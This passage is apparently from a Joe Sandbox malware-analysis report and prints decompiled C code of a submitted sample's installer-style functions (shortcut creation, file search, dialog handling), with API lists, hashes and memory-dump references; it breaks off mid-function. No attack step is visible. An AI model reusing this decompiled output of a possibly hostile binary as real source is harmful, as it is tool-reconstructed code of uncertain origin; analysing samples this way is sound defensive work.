                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: /B$A$C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 2624150263-3569768251
                                                  • Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                  • Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
                                                  • Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                  • Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
				_t96 = E00402A0C(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
				if(E0040585B(_t96) == 0) {
					E00402A0C(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                  0x0040203f
                                                  0x00402049
                                                  0x00402052
                                                  0x0040205c
                                                  0x00402065
                                                  0x0040206f
                                                  0x00402073
                                                  0x00402073
                                                  0x00402078
                                                  0x00402089
                                                  0x00402091
                                                  0x00402171
                                                  0x00402171
                                                  0x00402178
                                                  0x00402097
                                                  0x00402097
                                                  0x004020a8
                                                  0x004020ac
                                                  0x004020b2
                                                  0x004020bc
                                                  0x004020be
                                                  0x004020c9
                                                  0x004020cc
                                                  0x004020d9
                                                  0x004020db
                                                  0x004020dd
                                                  0x004020e4
                                                  0x004020e7
                                                  0x004020e7
                                                  0x004020ea
                                                  0x004020f4
                                                  0x004020fc
                                                  0x00402101
                                                  0x0040210d
                                                  0x0040210d
                                                  0x00402110
                                                  0x00402119
                                                  0x0040211c
                                                  0x00402125
                                                  0x0040212a
                                                  0x0040213c
                                                  0x0040214b
                                                  0x0040214d
                                                  0x00402159
                                                  0x00402159
                                                  0x0040214b
                                                  0x0040215b
                                                  0x00402161
                                                  0x00402161
                                                  0x00402164
                                                  0x0040216a
                                                  0x0040216f
                                                  0x00402184
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040216f
                                                  0x0040217a
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                  • CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 123533781-47812868
                                                  • Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                  • Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
                                                  • Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                  • Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402654 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E00402654(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
					E00405C59(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405CFB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                  0x0040266c
                                                  0x00402680
                                                  0x0040268b
                                                  0x0040268c
                                                  0x004027c7
                                                  0x0040266e
                                                  0x0040266e
                                                  0x00402670
                                                  0x00402672
                                                  0x00402672
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                  • Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
                                                  • Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                  • Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403AE4 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 83%
                                                  			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420564 = _t35;
					if(_t115 == 0x110) {
						 *0x423f88 = _t125;
						 *0x420578 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f540 = _t91;
						E00403FB7(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
						 *0x42374c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420564 = 1;
					}
					_t122 =  *0x4091e8; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423fa0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00404003(0x40b);
						while(1) {
							_t37 =  *0x420564;
							 *0x4091e8 =  *0x4091e8 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091e8; // 0xffffffff
							__eflags = _t39 -  *0x423fa4;
							if(_t39 ==  *0x423fa4) {
								E0040140B(1);
							}
							__eflags =  *0x42374c - _t133;
							if( *0x42374c != _t133) {
								break;
							}
							__eflags =  *0x4091e8 -  *0x423fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FB7(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42400c - _t133;
							_v32 = _t49;
							if( *0x42400c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403FD9(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f540, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42400c - _t133;
							if( *0x42400c == _t133) {
								_push( *0x420578);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f540);
							}
							E00403FEC();
							E00405CFB(0x420580, 0x423780);
							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420580);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423758);
									 *0x41fd50 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423758 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FB7(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42374c - _t133;
									if( *0x42374c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423758, 8);
									E00404003(0x405);
									goto L58;
								}
								__eflags =  *0x42400c - _t133;
								if( *0x42400c != _t133) {
									goto L61;
								}
								__eflags =  *0x424000 - _t133;
								if( *0x424000 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423758);
						 *0x423f88 = _t133;
						EndDialog(_t125,  *0x41f948);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423758, 0x40f, 0, 1);
						__eflags =  *0x42374c;
						return 0 |  *0x42374c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E0040401E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423758, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42400c - _t133;
										if( *0x42400c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f948 = 1;
											L21:
											_push(0x78);
											L22:
											E00403F90();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f948 = _t127;
										goto L21;
									}
									__eflags =  *0x4091e8 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423758);
						 *0x423758 = _a12;
						L58:
						_t141 =  *0x421580 - _t133; // 0x0
						if(_t141 == 0 &&  *0x423758 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421580 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                  0x00403aed
                                                  0x00403af6
                                                  0x00403c37
                                                  0x00403c3b
                                                  0x00403c3f
                                                  0x00403c41
                                                  0x00403c46
                                                  0x00403c51
                                                  0x00403c5c
                                                  0x00403c61
                                                  0x00403c63
                                                  0x00403c65
                                                  0x00403c68
                                                  0x00403c6d
                                                  0x00403c7b
                                                  0x00403c88
                                                  0x00403c8f
                                                  0x00403c8f
                                                  0x00403c90
                                                  0x00403c90
                                                  0x00403c95
                                                  0x00403c9b
                                                  0x00403ca2
                                                  0x00403ca8
                                                  0x00403caa
                                                  0x00403cea
                                                  0x00403cef
                                                  0x00403cf4
                                                  0x00403cf4
                                                  0x00403cf9
                                                  0x00403d02
                                                  0x00403d04
                                                  0x00403d09
                                                  0x00403d0f
                                                  0x00403d13
                                                  0x00403d13
                                                  0x00403d18
                                                  0x00403d1e
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d29
                                                  0x00403d2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d38
                                                  0x00403d40
                                                  0x00403d45
                                                  0x00403d48
                                                  0x00403d4e
                                                  0x00403d53
                                                  0x00403d56
                                                  0x00403d5c
                                                  0x00403d61
                                                  0x00403d64
                                                  0x00403d6a
                                                  0x00403d72
                                                  0x00403d78
                                                  0x00403d7e
                                                  0x00403d82
                                                  0x00403d89
                                                  0x00403d89
                                                  0x00403d89
                                                  0x00403d93
                                                  0x00403da5
                                                  0x00403db1
                                                  0x00403db6
                                                  0x00403dc0
                                                  0x00403dc6
                                                  0x00403dc8
                                                  0x00403dcd
                                                  0x00403dca
                                                  0x00403dca
                                                  0x00403dca
                                                  0x00403ddd
                                                  0x00403df5
                                                  0x00403df7
                                                  0x00403dfd
                                                  0x00403e12
                                                  0x00403dff
                                                  0x00403e08
                                                  0x00403e0a
                                                  0x00403e0a
                                                  0x00403e18
                                                  0x00403e28
                                                  0x00403e39
                                                  0x00403e40
                                                  0x00403e46
                                                  0x00403e4a
                                                  0x00403e4f
                                                  0x00403e51
                                                  0x00000000
                                                  0x00403e57
                                                  0x00403e57
                                                  0x00403e59
                                                  0x00000000
                                                  0x00000000
                                                  0x00403e5f
                                                  0x00403e63
                                                  0x00403e88
                                                  0x00403e8e
                                                  0x00403e94
                                                  0x00403e96
                                                  0x00000000
                                                  0x00000000
                                                  0x00403ebc
                                                  0x00403ec2
                                                  0x00403ec4
                                                  0x00403ec9
                                                  0x00000000
                                                  0x00000000
                                                  0x00403ecf
                                                  0x00403ed2
                                                  0x00403ed5
                                                  0x00403eec
                                                  0x00403ef8
                                                  0x00403f11
                                                  0x00403f17
                                                  0x00403f1b
                                                  0x00403f20
                                                  0x00403f26
                                                  0x00000000
                                                  0x00000000
                                                  0x00403f30
                                                  0x00403f3b
                                                  0x00000000
                                                  0x00403f3b
                                                  0x00403e65
                                                  0x00403e6b
                                                  0x00000000
                                                  0x00000000
                                                  0x00403e71
                                                  0x00403e77
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403e7d
                                                  0x00403e51
                                                  0x00403f48
                                                  0x00403f54
                                                  0x00403f5b
                                                  0x00000000
                                                  0x00403cac
                                                  0x00403cac
                                                  0x00403caf
                                                  0x00403ce2
                                                  0x00403ce2
                                                  0x00403ce4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403ce4
                                                  0x00403cb1
                                                  0x00403cb5
                                                  0x00403cba
                                                  0x00403cbc
                                                  0x00000000
                                                  0x00000000
                                                  0x00403ccc
                                                  0x00403cd4
                                                  0x00000000
                                                  0x00403cda
                                                  0x00403b08
                                                  0x00403b08
                                                  0x00403b0c
                                                  0x00403b11
                                                  0x00403b20
                                                  0x00403b20
                                                  0x00403b29
                                                  0x00403b32
                                                  0x00403b3d
                                                  0x00403b3d
                                                  0x00403b49
                                                  0x00403b65
                                                  0x00403b68
                                                  0x00403b7b
                                                  0x00403b81
                                                  0x00403c24
                                                  0x00000000
                                                  0x00403c2d
                                                  0x00403b87
                                                  0x00403b94
                                                  0x00403b96
                                                  0x00403b98
                                                  0x00403bb7
                                                  0x00403bb7
                                                  0x00403bba
                                                  0x00403bbf
                                                  0x00403bc2
                                                  0x00403bd2
                                                  0x00403bd3
                                                  0x00403bd5
                                                  0x00403c0b
                                                  0x00403c1e
                                                  0x00000000
                                                  0x00403c1e
                                                  0x00403bd7
                                                  0x00403bdd
                                                  0x00403bf6
                                                  0x00403bfb
                                                  0x00403bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bff
                                                  0x00403beb
                                                  0x00403beb
                                                  0x00403bed
                                                  0x00403bed
                                                  0x00000000
                                                  0x00403bed
                                                  0x00403be0
                                                  0x00403be5
                                                  0x00000000
                                                  0x00403be5
                                                  0x00403bc4
                                                  0x00403bca
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bcc
                                                  0x00000000
                                                  0x00403bcc
                                                  0x00403bbc
                                                  0x00000000
                                                  0x00403bbc
                                                  0x00403ba2
                                                  0x00403ba9
                                                  0x00403baf
                                                  0x00403bb1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bb1
                                                  0x00403b6d
                                                  0x00000000
                                                  0x00403b4b
                                                  0x00403b51
                                                  0x00403b5b
                                                  0x00403f61
                                                  0x00403f61
                                                  0x00403f67
                                                  0x00403f74
                                                  0x00403f7a
                                                  0x00403f7a
                                                  0x00403f84
                                                  0x00000000
                                                  0x00403f84
                                                  0x00403b49

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                                  • ShowWindow.USER32(?), ref: 00403B3D
                                                  • DestroyWindow.USER32 ref: 00403B51
                                                  • SetWindowLongA.USER32 ref: 00403B6D
                                                  • GetDlgItem.USER32 ref: 00403B8E
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                                  • GetDlgItem.USER32 ref: 00403C57
                                                  • GetDlgItem.USER32 ref: 00403C61
                                                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                                                  • GetDlgItem.USER32 ref: 00403D72
                                                  • ShowWindow.USER32(00000000,?), ref: 00403D93
                                                  • EnableWindow.USER32(?,?), ref: 00403DA5
                                                  • EnableWindow.USER32(?,?), ref: 00403DC0
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                                  • EnableMenuItem.USER32 ref: 00403DDD
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E08
                                                  • lstrlenA.KERNEL32(00420580,?,00420580,00423780), ref: 00403E31
                                                  • SetWindowTextA.USER32(?,00420580), ref: 00403E40
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403F74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 184305955-0
                                                  • Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                  • Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
                                                  • Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                  • Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004040FF Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420560 =  *0x420560 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040401E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422f20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd50 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
